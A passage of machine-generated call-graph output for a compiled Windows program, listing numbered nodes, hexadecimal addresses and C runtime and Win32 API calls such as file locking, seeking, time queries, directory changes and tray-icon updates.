47 API calls __getptd_noexit 94667->94678 94680 7d4e1c 94669->94680 94670 7d3aac 94679 7d6e10 8 API calls ___strgtold12_l 94670->94679 94673 7d3ad3 94686 7d39fe 81 API calls 3 library calls 94673->94686 94675 7d3ae2 94687 7d3b04 LeaveCriticalSection LeaveCriticalSection _fseek 94675->94687 94677 7d3ab7 __freefls@4 94677->94663 94678->94670 94679->94677 94681 7d4e2c 94680->94681 94682 7d4e4e EnterCriticalSection 94680->94682 94681->94682 94683 7d4e34 94681->94683 94684 7d4e44 94682->94684 94685 7d7cf4 __lock 47 API calls 94683->94685 94684->94673 94685->94684 94686->94675 94687->94677 94691 7d3839 94688->94691 94690 7b4510 94690->94547 94692 7d3845 __freefls@4 94691->94692 94693 7d3880 __freefls@4 94692->94693 94694 7d3888 94692->94694 94695 7d385b _memset 94692->94695 94693->94690 94696 7d4e1c __lock_file 48 API calls 94694->94696 94704 7d7c0e 47 API calls __getptd_noexit 94695->94704 94697 7d388e 94696->94697 94706 7d365b 62 API calls 5 library calls 94697->94706 94700 7d3875 94705 7d6e10 8 API calls ___strgtold12_l 94700->94705 94701 7d38a4 94707 7d38c2 LeaveCriticalSection LeaveCriticalSection _fseek 94701->94707 94704->94700 94705->94693 94706->94701 94707->94693 94711 7d344a GetSystemTimeAsFileTime 94708->94711 94710 7fbdc3 94710->94549 94712 7d3478 __aulldiv 94711->94712 94712->94710 94714 7d3e71 __freefls@4 94713->94714 94715 7d3e7f 94714->94715 94716 7d3e94 94714->94716 94727 7d7c0e 47 API calls __getptd_noexit 94715->94727 94718 7d4e1c __lock_file 48 API calls 94716->94718 94720 7d3e9a 94718->94720 94719 7d3e84 94728 7d6e10 8 API calls ___strgtold12_l 94719->94728 94729 7d3b0c 55 API calls 3 library calls 94720->94729 94723 7d3ea5 94730 7d3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94723->94730 94725 7d3eb7 94726 7d3e8f __freefls@4 94725->94726 94726->94553 94727->94719 94728->94726 94729->94723 94730->94725 94733 7fc581 __tzset_nolock _wcscmp 94731->94733 94732 7b44ed 64 API calls 94732->94733 94733->94732 94734 7fbf5a GetSystemTimeAsFileTime 94733->94734 94735 7fc417 94733->94735 94736 7b4517 83 API calls 94733->94736 94734->94733 94735->94470 94735->94498 94736->94733 94738 7fb97e 94737->94738 94739 7fb970 94737->94739 94741 7fb9c3 94738->94741 94742 7d3499 117 API calls 94738->94742 94767 7fb987 94738->94767 94740 7d3499 117 API calls 94739->94740 94740->94738 94768 7fbbe8 64 API calls 3 library calls 94741->94768 94744 7fb9a8 94742->94744 94744->94741 94746 7fb9b1 94744->94746 94745 7fba07 94747 7fba2c 94745->94747 94748 7fba0b 94745->94748 94746->94767 94779 7d35e4 94746->94779 94769 7fb7e5 47 API calls __crtGetStringTypeA_stat 94747->94769 94750 7fba18 94748->94750 94753 7d35e4 __fcloseall 83 API calls 94748->94753 94756 7d35e4 __fcloseall 83 API calls 94750->94756 94750->94767 94752 7fba34 94754 7fba5a 94752->94754 94755 7fba3a 94752->94755 94753->94750 94770 7fba8a 90 API calls 94754->94770 94757 7fba47 94755->94757 94759 7d35e4 __fcloseall 83 API calls 94755->94759 94756->94767 94761 7d35e4 __fcloseall 83 API calls 94757->94761 94757->94767 94759->94757 94760 7fba61 94771 7fbb64 94760->94771 94761->94767 94764 7fba75 94766 7d35e4 __fcloseall 83 API calls 94764->94766 94764->94767 94765 7d35e4 __fcloseall 83 API calls 94765->94764 94766->94767 94767->94499 94768->94745 94769->94752 94770->94760 94772 7fbb77 94771->94772 94773 7fbb71 94771->94773 94775 7fbb88 94772->94775 94776 7d1c9d _free 47 API calls 94772->94776 94774 7d1c9d _free 47 API calls 94773->94774 94774->94772 94777 7d1c9d _free 47 API calls 94775->94777 94778 7fba68 94775->94778 94776->94775 94777->94778 94778->94764 94778->94765 94780 7d35f0 __freefls@4 94779->94780 94781 7d361c 94780->94781 94782 7d3604 94780->94782 94784 7d4e1c __lock_file 48 API calls 94781->94784 94789 7d3614 __freefls@4 94781->94789 94808 7d7c0e 47 API calls __getptd_noexit 94782->94808 94786 7d362e 94784->94786 94785 7d3609 94809 7d6e10 8 API calls ___strgtold12_l 94785->94809 94792 7d3578 94786->94792 94789->94767 94793 7d359b 94792->94793 94794 7d3587 94792->94794 94800 7d3597 94793->94800 94811 7d2c84 94793->94811 94851 7d7c0e 47 API calls __getptd_noexit 94794->94851 94796 7d358c 94852 7d6e10 8 API calls ___strgtold12_l 94796->94852 94810 7d3653 LeaveCriticalSection LeaveCriticalSection _fseek 94800->94810 94804 7d35b5 94828 7de9d2 94804->94828 94806 7d35bb 94806->94800 94807 7d1c9d _free 47 API calls 94806->94807 94807->94800 94808->94785 94809->94789 94810->94789 94812 7d2c97 94811->94812 94816 7d2cbb 94811->94816 94813 7d2933 __ftell_nolock 47 API calls 94812->94813 94812->94816 94814 7d2cb4 94813->94814 94853 7daf61 94814->94853 94817 7deb36 94816->94817 94818 7deb43 94817->94818 94820 7d35af 94817->94820 94819 7d1c9d _free 47 API calls 94818->94819 94818->94820 94819->94820 94821 7d2933 94820->94821 94822 7d293d 94821->94822 94823 7d2952 94821->94823 94878 7d7c0e 47 API calls __getptd_noexit 94822->94878 94823->94804 94825 7d2942 94879 7d6e10 8 API calls ___strgtold12_l 94825->94879 94827 7d294d 94827->94804 94829 7de9de __freefls@4 94828->94829 94830 7de9fe 94829->94830 94831 7de9e6 94829->94831 94832 7dea7b 94830->94832 94837 7dea28 94830->94837 94904 7d7bda 47 API calls __getptd_noexit 94831->94904 94908 7d7bda 47 API calls __getptd_noexit 94832->94908 94834 7de9eb 94905 7d7c0e 47 API calls __getptd_noexit 94834->94905 94836 7dea80 94909 7d7c0e 47 API calls __getptd_noexit 94836->94909 94880 7da8ed 94837->94880 94841 7de9f3 __freefls@4 94841->94806 94842 7dea88 94910 7d6e10 8 API calls ___strgtold12_l 94842->94910 94843 7dea2e 94845 7dea4c 94843->94845 94846 7dea41 94843->94846 94906 7d7c0e 47 API calls __getptd_noexit 94845->94906 94889 7dea9c 94846->94889 94849 7dea47 94907 7dea73 LeaveCriticalSection __unlock_fhandle 94849->94907 94851->94796 94852->94800 94854 7daf6d __freefls@4 94853->94854 94855 7daf8d 94854->94855 94856 7daf75 94854->94856 94858 7db022 94855->94858 94862 7dafbf 94855->94862 94857 7d7bda __set_osfhnd 47 API calls 94856->94857 94859 7daf7a 94857->94859 94860 7d7bda __set_osfhnd 47 API calls 94858->94860 94861 7d7c0e ___strgtold12_l 47 API calls 94859->94861 94863 7db027 94860->94863 94873 7daf82 __freefls@4 94861->94873 94864 7da8ed ___lock_fhandle 49 API calls 94862->94864 94865 7d7c0e ___strgtold12_l 47 API calls 94863->94865 94866 7dafc5 94864->94866 94867 7db02f 94865->94867 94868 7dafd8 94866->94868 94869 7dafeb 94866->94869 94870 7d6e10 ___strgtold12_l 8 API calls 94867->94870 94872 7db043 __chsize_nolock 75 API calls 94868->94872 94871 7d7c0e ___strgtold12_l 47 API calls 94869->94871 94870->94873 94874 7daff0 94871->94874 94875 7dafe4 94872->94875 94873->94816 94876 7d7bda __set_osfhnd 47 API calls 94874->94876 94877 7db01a __flush LeaveCriticalSection 94875->94877 94876->94875 94877->94873 94878->94825 94879->94827 94881 7da8f9 __freefls@4 94880->94881 94882 7da946 EnterCriticalSection 94881->94882 94883 7d7cf4 __lock 47 API calls 94881->94883 94884 7da96c __freefls@4 94882->94884 94885 7da91d 94883->94885 94884->94843 94886 7da928 InitializeCriticalSectionAndSpinCount 94885->94886 94887 7da93a 94885->94887 94886->94887 94888 7da970 ___lock_fhandle LeaveCriticalSection 94887->94888 94888->94882 94890 7daba4 __lseeki64_nolock 47 API calls 94889->94890 94892 7deaaa 94890->94892 94891 7deb00 94894 7dab1e __free_osfhnd 48 API calls 94891->94894 94892->94891 94893 7deade 94892->94893 94895 7daba4 __lseeki64_nolock 47 API calls 94892->94895 94893->94891 94896 7daba4 __lseeki64_nolock 47 API calls 94893->94896 94897 7deb08 94894->94897 94898 7dead5 94895->94898 94899 7deaea CloseHandle 94896->94899 94900 7deb2a 94897->94900 94903 7d7bed __dosmaperr 47 API calls 94897->94903 94901 7daba4 __lseeki64_nolock 47 API calls 94898->94901 94899->94891 94902 7deaf6 GetLastError 94899->94902 94900->94849 94901->94893 94902->94891 94903->94900 94904->94834 94905->94841 94906->94849 94907->94841 94908->94836 94909->94842 94910->94841 94911->94352 94912->94359 94913->94369 94914->94369 94915->94370 94916->94383 94917->94385 94918->94382 94919->94390 94920->94396 94921->94409 94922->94403 94982 7df8a0 94923->94982 94926 7b6a63 48 API calls 94927 7b6643 94926->94927 94984 7b6571 94927->94984 94930 7b40a7 94931 7df8a0 __ftell_nolock 94930->94931 94932 7b40b4 GetLongPathNameW 94931->94932 94933 7b6a63 48 API calls 94932->94933 94934 7b40dc 94933->94934 94935 7b49a0 94934->94935 94936 7bd7f7 48 API calls 94935->94936 94937 7b49b2 94936->94937 94938 7b660f 49 API calls 94937->94938 94939 7b49bd 94938->94939 94940 7b49c8 94939->94940 94941 822e35 94939->94941 94942 7b64cf 48 API calls 94940->94942 94946 822e4f 94941->94946 94998 7cd35e 60 API calls 94941->94998 94944 7b49d4 94942->94944 94992 7b28a6 94944->94992 94947 7b49e7 Mailbox 94947->94146 94949 7b41a9 136 API calls 94948->94949 94950 7b415e 94949->94950 94951 823489 94950->94951 94953 7b41a9 136 API calls 94950->94953 94952 7fc396 122 API calls 94951->94952 94954 82349e 94952->94954 94955 7b4172 94953->94955 94956 8234a2 94954->94956 94957 8234bf 94954->94957 94955->94951 94958 7b417a 94955->94958 94961 7b4252 84 API calls 94956->94961 94962 7cf4ea 48 API calls 94957->94962 94959 8234aa 94958->94959 94960 7b4186 94958->94960 95101 7f6b49 87 API calls _wprintf 94959->95101 94999 7bc833 94960->94999 94961->94959 94981 823504 Mailbox 94962->94981 94966 8234b8 94966->94957 94967 8236b4 94968 7d1c9d _free 47 API calls 94967->94968 94969 8236bc 94968->94969 94970 7b4252 84 API calls 94969->94970 94975 8236c5 94970->94975 94974 7d1c9d _free 47 API calls 94974->94975 94975->94974 94976 7b4252 84 API calls 94975->94976 95105 7f25b5 86 API calls 4 library calls 94975->95105 94976->94975 94978 7bce19 48 API calls 94978->94981 94981->94967 94981->94975 94981->94978 95087 7bba85 94981->95087 95095 7b4dd9 94981->95095 95102 7f2551 48 API calls ___crtGetEnvironmentStringsW 94981->95102 95103 7f2472 60 API calls 2 library calls 94981->95103 95104 7f9c12 48 API calls 94981->95104 94983 7b661c GetFullPathNameW 94982->94983 94983->94926 94985 7b657f 94984->94985 94988 7bb18b 94985->94988 94987 7b4114 94987->94930 94989 7bb1a2 ___crtGetEnvironmentStringsW 94988->94989 94990 7bb199 94988->94990 94989->94987 94990->94989 94991 7bbdfa 48 API calls 94990->94991 94991->94989 94993 7b28b8 94992->94993 94997 7b28d7 ___crtGetEnvironmentStringsW 94992->94997 94996 7cf4ea 48 API calls 94993->94996 94994 7cf4ea 48 API calls 94995 7b28ee 94994->94995 94995->94947 94996->94997 94997->94994 94998->94941 95000 7bc843 __ftell_nolock 94999->95000 95001 823095 95000->95001 95002 7bc860 95000->95002 95130 7f25b5 86 API calls 4 library calls 95001->95130 95111 7b48ba 49 API calls 95002->95111 95005 8230a8 95131 7f25b5 86 API calls 4 library calls 95005->95131 95006 7bc882 95112 7b4550 56 API calls 95006->95112 95008 7bc897 95008->95005 95009 7bc89f 95008->95009 95011 7bd7f7 48 API calls 95009->95011 95013 7bc8ab 95011->95013 95012 8230c4 95014 7bc90c 95012->95014 95113 7ce968 49 API calls __ftell_nolock 95013->95113 95016 7bc91a 95014->95016 95017 8230d7 95014->95017 95116 7d1dfc 95016->95116 95020 7b4907 CloseHandle 95017->95020 95018 7bc8b7 95021 7bd7f7 48 API calls 95018->95021 95022 8230e3 95020->95022 95023 7bc8c3 95021->95023 95024 7b41a9 136 API calls 95022->95024 95025 7b660f 49 API calls 95023->95025 95026 82310d 95024->95026 95027 7bc8d1 95025->95027 95029 823136 95026->95029 95032 7fc396 122 API calls 95026->95032 95114 7ceb66 SetFilePointerEx ReadFile 95027->95114 95028 7bc943 _wcscat _wcscpy 95031 7bc96d SetCurrentDirectoryW 95028->95031 95132 7f25b5 86 API calls 4 library calls 95029->95132 95035 7cf4ea 48 API calls 95031->95035 95036 823129 95032->95036 95033 7bc8fd 95115 7b46ce SetFilePointerEx SetFilePointerEx 95033->95115 95039 7bc988 95035->95039 95040 823152 95036->95040 95041 823131 95036->95041 95038 82314d 95047 7bcad1 Mailbox 95038->95047 95043 7b47b7 48 API calls 95039->95043 95042 7b4252 84 API calls 95040->95042 95044 7b4252 84 API calls 95041->95044 95045 823157 95042->95045 95059 7bc993 Mailbox __wsetenvp 95043->95059 95044->95029 95046 7cf4ea 48 API calls 95045->95046 95054 823194 95046->95054 95106 7b48dd 95047->95106 95048 7bca9d 95126 7b4907 95048->95126 95052 7b3d98 95052->94015 95052->94037 95053 7bcaa9 SetCurrentDirectoryW 95053->95047 95056 7bba85 48 API calls 95054->95056 95083 8231dd Mailbox 95056->95083 95058 8233ce 95137 7f9b72 48 API calls 95058->95137 95059->95048 95069 82345f 95059->95069 95071 7bce19 48 API calls 95059->95071 95073 823467 95059->95073 95119 7bb337 56 API calls _wcscpy 95059->95119 95120 7cc258 GetStringTypeW 95059->95120 95121 7bcb93 59 API calls __wcsnicmp 95059->95121 95122 7bcb5a GetStringTypeW __wsetenvp 95059->95122 95123 7d16d0 GetStringTypeW __wtof_l 95059->95123 95124 7bcc24 162 API calls 3 library calls 95059->95124 95125 7cc682 48 API calls 95059->95125 95062 823480 95062->95048 95064 8233f0 95138 8129e8 48 API calls ___crtGetEnvironmentStringsW 95064->95138 95066 8233fd 95067 7d1c9d _free 47 API calls 95066->95067 95067->95047 95140 7f240b 48 API calls 3 library calls 95069->95140 95071->95059 95072 7bba85 48 API calls 95072->95083 95141 7f25b5 86 API calls 4 library calls 95073->95141 95078 7bce19 48 API calls 95078->95083 95081 823420 95139 7f25b5 86 API calls 4 library calls 95081->95139 95083->95058 95083->95072 95083->95078 95083->95081 95133 7f2551 48 API calls ___crtGetEnvironmentStringsW 95083->95133 95134 7f2472 60 API calls 2 library calls 95083->95134 95135 7f9c12 48 API calls 95083->95135 95136 7cc682 48 API calls 95083->95136 95084 823439 95085 7d1c9d _free 47 API calls 95084->95085 95086 82344c 95085->95086 95086->95047 95088 7bbb25 95087->95088 95092 7bba98 ___crtGetEnvironmentStringsW 95087->95092 95090 7cf4ea 48 API calls 95088->95090 95089 7cf4ea 48 API calls 95091 7bba9f 95089->95091 95090->95092 95093 7cf4ea 48 API calls 95091->95093 95094 7bbac8 95091->95094 95092->95089 95093->95094 95094->94981 95096 7b4dec 95095->95096 95100 7b4e9a 95095->95100 95097 7b4e1e 95096->95097 95098 7cf4ea 48 API calls 95096->95098 95099 7cf4ea 48 API calls 95097->95099 95097->95100 95098->95097 95099->95097 95100->94981 95101->94966 95102->94981 95103->94981 95104->94981 95105->94975 95107 7b4907 CloseHandle 95106->95107 95108 7b48e5 Mailbox 95107->95108 95109 7b4907 CloseHandle 95108->95109 95110 7b48fc 95109->95110 95110->95052 95111->95006 95112->95008 95113->95018 95114->95033 95115->95014 95142 7d1e46 95116->95142 95119->95059 95120->95059 95121->95059 95122->95059 95123->95059 95124->95059 95125->95059 95127 7b4911 95126->95127 95128 7b4920 95126->95128 95127->95053 95128->95127 95129 7b4925 CloseHandle 95128->95129 95129->95127 95130->95005 95131->95012 95132->95038 95133->95083 95134->95083 95135->95083 95136->95083 95137->95064 95138->95066 95139->95084 95140->95073 95141->95062 95143 7d1e61 95142->95143 95145 7d1e55 95142->95145 95166 7d7c0e 47 API calls __getptd_noexit 95143->95166 95145->95143 95152 7d1ed4 95145->95152 95161 7d9d6b 47 API calls ___strgtold12_l 95145->95161 95146 7d2019 95150 7d1e41 95146->95150 95167 7d6e10 8 API calls ___strgtold12_l 95146->95167 95149 7d1fa0 95149->95143 95149->95150 95153 7d1fb0 95149->95153 95150->95028 95151 7d1f5f 95151->95143 95154 7d1f7b 95151->95154 95163 7d9d6b 47 API calls ___strgtold12_l 95151->95163 95152->95143 95160 7d1f41 95152->95160 95162 7d9d6b 47 API calls ___strgtold12_l 95152->95162 95165 7d9d6b 47 API calls ___strgtold12_l 95153->95165 95154->95143 95154->95150 95157 7d1f91 95154->95157 95164 7d9d6b 47 API calls ___strgtold12_l 95157->95164 95160->95149 95160->95151 95161->95152 95162->95160 95163->95154 95164->95150 95165->95150 95166->95146 95167->95150 95169 7cf4ea 48 API calls 95168->95169 95170 7b6b54 95169->95170 95170->94158 95171->94152 95173 7b4c8b 95172->95173 95178 7b4d94 95172->95178 95174 7cf4ea 48 API calls 95173->95174 95173->95178 95175 7b4cb2 95174->95175 95176 7cf4ea 48 API calls 95175->95176 95182 7b4d22 95176->95182 95178->94163 95180 7b4dd9 48 API calls 95180->95182 95181 7bba85 48 API calls 95181->95182 95182->95178 95182->95180 95182->95181 95185 7bb470 95182->95185 95213 7f9af1 48 API calls 95182->95213 95183->94165 95184->94167 95214 7b6b0f 95185->95214 95187 7bb69b 95188 7bba85 48 API calls 95187->95188 95189 7bb6b5 Mailbox 95188->95189 95189->95182 95192 7bba85 48 API calls 95204 7bb495 95192->95204 95193 82397b 95229 7f26bc 88 API calls 4 library calls 95193->95229 95196 7bb9e4 95230 7f26bc 88 API calls 4 library calls 95196->95230 95197 823973 95197->95189 95200 7bbcce 48 API calls 95200->95204 95201 823989 95202 7bba85 48 API calls 95201->95202 95202->95197 95203 823909 95206 7b6b4a 48 API calls 95203->95206 95204->95187 95204->95192 95204->95193 95204->95196 95204->95200 95204->95203 95209 7bbdfa 48 API calls 95204->95209 95212 823939 ___crtGetEnvironmentStringsW 95204->95212 95219 7bc413 59 API calls 95204->95219 95220 7bbb85 95204->95220 95225 7bbc74 48 API calls 95204->95225 95226 7bc6a5 49 API calls 95204->95226 95227 7bc799 48 API calls ___crtGetEnvironmentStringsW 95204->95227 95208 823914 95206->95208 95211 7cf4ea 48 API calls 95208->95211 95210 7bb66c CharUpperBuffW 95209->95210 95210->95204 95211->95212 95228 7f26bc 88 API calls 4 library calls 95212->95228 95213->95182 95215 7cf4ea 48 API calls 95214->95215 95216 7b6b34 95215->95216 95217 7b6b4a 48 API calls 95216->95217 95218 7b6b43 95217->95218 95218->95204 95219->95204 95222 7bbb9b 95220->95222 95224 7bbb96 ___crtGetEnvironmentStringsW 95220->95224 95221 821b77 95222->95221 95223 7cee75 48 API calls 95222->95223 95223->95224 95224->95204 95225->95204 95226->95204 95227->95204 95228->95197 95229->95201 95230->95197 95232 7b403c LoadImageW 95231->95232 95233 82418d EnumResourceNamesW 95231->95233 95234 7b3ee1 RegisterClassExW 95232->95234 95233->95234 95235 7b3f53 7 API calls 95234->95235 95235->94182 95237 823c33 95236->95237 95238 7b4c44 95236->95238 95237->95238 95239 823c3c DestroyIcon 95237->95239 95238->94188 95262 7f5819 61 API calls _W_store_winword 95238->95262 95239->95238 95241 7b51cb 95240->95241 95261 7b52a2 Mailbox 95240->95261 95242 7b6b0f 48 API calls 95241->95242 95243 7b51d9 95242->95243 95244 823ca1 LoadStringW 95243->95244 95245 7b51e6 95243->95245 95248 823cbb 95244->95248 95246 7b6a63 48 API calls 95245->95246 95247 7b51fb 95246->95247 95247->95248 95249 7b520c 95247->95249 95250 7b510d 48 API calls 95248->95250 95251 7b52a7 95249->95251 95252 7b5216 95249->95252 95255 823cc5 95250->95255 95253 7b6eed 48 API calls 95251->95253 95254 7b510d 48 API calls 95252->95254 95258 7b5220 _memset _wcscpy 95253->95258 95254->95258 95256 7b518c 48 API calls 95255->95256 95255->95258 95257 823ce7 95256->95257 95260 7b518c 48 API calls 95257->95260 95259 7b5288 Shell_NotifyIconW 95258->95259 95259->95261 95260->95258 95261->94193 95262->94188 95264 7bef2f 95263->95264 95265 7bef1d 95263->95265 95430 7fcc5c 86 API calls 4 library calls 95264->95430 95266 7bef26 95265->95266 95429 7be3b0 331 API calls 2 library calls 95265->95429 95266->94218 95269 8286f9 95269->95269 95271 7bf130 95270->95271 95274 7bfe30 331 API calls 95271->95274 95278 7bf199 95271->95278 95272 7bf3dd 95275 8287c8 95272->95275 95287 7bf3f2 95272->95287 95322 7bf431 Mailbox 95272->95322 95273 7bf595 95280 7bd7f7 48 API calls 95273->95280 95273->95322 95276 828728 95274->95276 95435 7fcc5c 86 API calls 4 library calls 95275->95435 95276->95278 95432 7fcc5c 86 API calls 4 library calls 95276->95432 95278->95272 95278->95273 95281 7bd7f7 48 API calls 95278->95281 95314 7bf229 95278->95314 95282 8287a3 95280->95282 95284 828772 95281->95284 95434 7d0f0a 52 API calls __cinit 95282->95434 95283 828b1b 95301 828bcf 95283->95301 95302 828b2c 95283->95302 95433 7d0f0a 52 API calls __cinit 95284->95433 95285 7fcc5c 86 API calls 95285->95322 95312 7bf418 95287->95312 95436 7f9af1 48 API calls 95287->95436 95288 7bf770 95295 828a45 95288->95295 95313 7bf77a 95288->95313 95290 7bd6e9 55 API calls 95290->95322 95292 828c53 95450 7fcc5c 86 API calls 4 library calls 95292->95450 95293 828810 95437 80eef8 331 API calls 95293->95437 95294 7bfe30 331 API calls 95315 7bf6aa 95294->95315 95442 7cc1af 48 API calls 95295->95442 95296 828b7e 95445 80e40a 331 API calls Mailbox 95296->95445 95447 7fcc5c 86 API calls 4 library calls 95301->95447 95444 80f5ee 331 API calls 95302->95444 95303 828beb 95448 80bdbd 331 API calls Mailbox 95303->95448 95305 7bfe30 331 API calls 95305->95322 95308 7c1b90 48 API calls 95308->95322 95310 7c1b90 48 API calls 95310->95322 95311 828c00 95333 7bf537 Mailbox 95311->95333 95449 7fcc5c 86 API calls 4 library calls 95311->95449 95312->95283 95312->95315 95312->95322 95313->95308 95314->95272 95314->95273 95314->95312 95314->95322 95315->95288 95315->95294 95316 7bfce0 95315->95316 95315->95322 95315->95333 95316->95333 95446 7fcc5c 86 API calls 4 library calls 95316->95446 95318 828823 95318->95312 95321 82884b 95318->95321 95438 80ccdc 48 API calls 95321->95438 95322->95285 95322->95290 95322->95292 95322->95296 95322->95303 95322->95305 95322->95310 95322->95316 95322->95333 95431 7bdd47 48 API calls ___crtGetEnvironmentStringsW 95322->95431 95443 7e97ed InterlockedDecrement 95322->95443 95451 7cc1af 48 API calls 95322->95451 95324 828857 95326 828865 95324->95326 95327 8288aa 95324->95327 95439 7f9b72 48 API calls 95326->95439 95330 8288a0 Mailbox 95327->95330 95440 7fa69d 48 API calls 95327->95440 95328 7bfe30 331 API calls 95328->95333 95330->95328 95332 8288e7 95441 7bbc74 48 API calls 95332->95441 95333->94218 95336 7c479f 95335->95336 95337 7c4637 95335->95337 95340 7bce19 48 API calls 95336->95340 95338 826e05 95337->95338 95339 7c4643 95337->95339 95506 80e822 95338->95506 95505 7c4300 331 API calls ___crtGetEnvironmentStringsW 95339->95505 95347 7c46e4 Mailbox 95340->95347 95343 826e11 95344 7c4739 Mailbox 95343->95344 95546 7fcc5c 86 API calls 4 library calls 95343->95546 95344->94218 95346 7c4659 95346->95343 95346->95344 95346->95347 95350 7b4252 84 API calls 95347->95350 95452 7ffa0c 95347->95452 95493 7f6524 95347->95493 95496 806ff0 95347->95496 95350->95344 95353 82df42 95352->95353 95354 7ce253 95352->95354 95355 82df77 95353->95355 95356 82df59 TranslateAcceleratorW 95353->95356 95354->94218 95356->95354 95358 7cdca3 95357->95358 95360 7cdc71 95357->95360 95358->94218 95359 7cdc96 IsDialogMessageW 95359->95358 95359->95360 95360->95358 95360->95359 95361 82dd1d GetClassLongW 95360->95361 95361->95359 95361->95360 95362->94218 95676 7bbd30 95363->95676 95365 7c3267 95385 7c3313 Mailbox ___crtGetEnvironmentStringsW 95365->95385 95688 7cc36b 86 API calls 95365->95688 95366 7fcc5c 86 API calls 95366->95385 95370 7bfe30 331 API calls 95370->95385 95371 7bd645 53 API calls 95371->95385 95372 7cc2d6 48 API calls 95372->95385 95375 7bd6e9 55 API calls 95375->95385 95379 7cc3c3 48 API calls 95379->95385 95382 7be8d0 331 API calls 95382->95385 95383 7b6eed 48 API calls 95383->95385 95385->95366 95385->95370 95385->95371 95385->95372 95385->95375 95385->95379 95385->95382 95385->95383 95386 7cf4ea 48 API calls 95385->95386 95387 7bdcae 50 API calls 95385->95387 95388 7c3635 Mailbox 95385->95388 95681 7b2b7a 95385->95681 95689 7bd9a0 53 API calls __cinit 95385->95689 95690 7bd8c0 53 API calls 95385->95690 95691 80f320 331 API calls 95385->95691 95692 80f5ee 331 API calls 95385->95692 95693 7b1caa 49 API calls 95385->95693 95694 80cda2 82 API calls Mailbox 95385->95694 95695 7f80e3 53 API calls 95385->95695 95696 7bd764 55 API calls 95385->95696 95697 7fc942 50 API calls 95385->95697 95386->95385 95387->95385 95388->94218 95389->94198 95390->94202 95391->94207 95392->94218 95393->94218 95394->94245 95395->94245 95396->94245 95398 7bfe50 95397->95398 95421 7bfe7e 95397->95421 95399 7cf4ea 48 API calls 95398->95399 95399->95421 95400 7c146e 95401 7b6eed 48 API calls 95400->95401 95423 7bffe1 95401->95423 95402 7e97ed InterlockedDecrement 95402->95421 95403 7bd7f7 48 API calls 95403->95421 95404 7c0509 95717 7fcc5c 86 API calls 4 library calls 95404->95717 95405 7cf4ea 48 API calls 95405->95421 95409 82a922 95409->94218 95410 82a246 95414 7b6eed 48 API calls 95410->95414 95411 7c1473 95716 7fcc5c 86 API calls 4 library calls 95411->95716 95413 7b6eed 48 API calls 95413->95421 95414->95423 95416 82a873 95416->94218 95417 82a30e 95417->95423 95714 7e97ed InterlockedDecrement 95417->95714 95418 7d0f0a 52 API calls __cinit 95418->95421 95420 82a973 95718 7fcc5c 86 API calls 4 library calls 95420->95718 95421->95400 95421->95402 95421->95403 95421->95404 95421->95405 95421->95410 95421->95411 95421->95413 95421->95417 95421->95418 95421->95420 95421->95423 95425 7c15b5 95421->95425 95699 7c1d10 95421->95699 95713 7c1820 331 API calls 2 library calls 95421->95713 95423->94218 95424 82a982 95715 7fcc5c 86 API calls 4 library calls 95425->95715 95426->94245 95427->94245 95428->94245 95429->95266 95430->95269 95431->95322 95432->95278 95433->95314 95434->95322 95435->95333 95436->95293 95437->95318 95438->95324 95439->95330 95440->95332 95441->95330 95442->95322 95443->95322 95444->95322 95445->95316 95446->95333 95447->95333 95448->95311 95449->95333 95450->95333 95451->95322 95453 7ffa1c __ftell_nolock 95452->95453 95454 7ffa44 95453->95454 95623 7bd286 48 API calls 95453->95623 95547 7b936c 95454->95547 95457 7ffa5e 95458 7ffb92 95457->95458 95459 7ffb68 95457->95459 95460 7ffa80 95457->95460 95458->95344 95461 7b41a9 136 API calls 95459->95461 95462 7b936c 81 API calls 95460->95462 95463 7ffb79 95461->95463 95468 7ffa8c _wcscpy _wcschr 95462->95468 95464 7ffb8e 95463->95464 95466 7b41a9 136 API calls 95463->95466 95464->95458 95465 7b936c 81 API calls 95464->95465 95467 7ffbc7 95465->95467 95466->95464 95469 7d1dfc __wsplitpath 47 API calls 95467->95469 95472 7ffab0 _wcscat _wcscpy 95468->95472 95475 7ffade _wcscat 95468->95475 95477 7ffbeb _wcscat _wcscpy 95469->95477 95470 7b936c 81 API calls 95471 7ffafc _wcscpy 95470->95471 95624 7f72cb GetFileAttributesW 95471->95624 95473 7b936c 81 API calls 95472->95473 95473->95475 95475->95470 95476 7ffb1c __wsetenvp 95476->95458 95478 7b936c 81 API calls 95476->95478 95481 7b936c 81 API calls 95477->95481 95479 7ffb48 95478->95479 95625 7f60dd 77 API calls 4 library calls 95479->95625 95483 7ffc82 95481->95483 95663 7f6ca9 GetFileAttributesW 95493->95663 95497 7b936c 81 API calls 95496->95497 95498 80702a 95497->95498 95499 7bb470 91 API calls 95498->95499 95500 80703a 95499->95500 95501 80705f 95500->95501 95502 7bfe30 331 API calls 95500->95502 95504 807063 95501->95504 95667 7bcdb9 48 API calls 95501->95667 95502->95501 95504->95344 95505->95346 95507 80e868 95506->95507 95508 80e84e 95506->95508 95669 80ccdc 48 API calls 95507->95669 95668 7fcc5c 86 API calls 4 library calls 95508->95668 95511 80e860 Mailbox 95511->95343 95512 80e871 95513 7bfe30 330 API calls 95512->95513 95514 80e8cf 95513->95514 95514->95511 95515 80e96a 95514->95515 95517 80e916 95514->95517 95516 80e978 95515->95516 95521 80e9c7 95515->95521 95671 7fa69d 48 API calls 95516->95671 95670 7f9b72 48 API calls 95517->95670 95520 80e949 95523 7c45e0 330 API calls 95520->95523 95521->95511 95524 7b936c 81 API calls 95521->95524 95522 80e99b 95672 7bbc74 48 API calls 95522->95672 95523->95511 95525 80e9e1 95524->95525 95527 7bbdfa 48 API calls 95525->95527 95529 80ea05 CharUpperBuffW 95527->95529 95528 80e9a3 Mailbox 95531 7c3200 330 API calls 95528->95531 95530 80ea1f 95529->95530 95532 80ea72 95530->95532 95533 80ea26 95530->95533 95531->95511 95534 7b936c 81 API calls 95532->95534 95673 7f9b72 48 API calls 95533->95673 95535 80ea7a 95534->95535 95674 7b1caa 49 API calls 95535->95674 95538 80ea54 95539 7c45e0 330 API calls 95538->95539 95539->95511 95546->95344 95548 7b9384 95547->95548 95560 7b9380 95547->95560 95549 824cbd __i64tow 95548->95549 95550 7b9398 95548->95550 95551 824bbf 95548->95551 95559 7b93b0 __itow Mailbox _wcscpy 95548->95559 95626 7d172b 80 API calls 3 library calls 95550->95626 95552 824ca5 95551->95552 95553 824bc8 95551->95553 95627 7d172b 80 API calls 3 library calls 95552->95627 95558 824be7 95553->95558 95553->95559 95556 7cf4ea 48 API calls 95557 7b93ba 95556->95557 95557->95560 95562 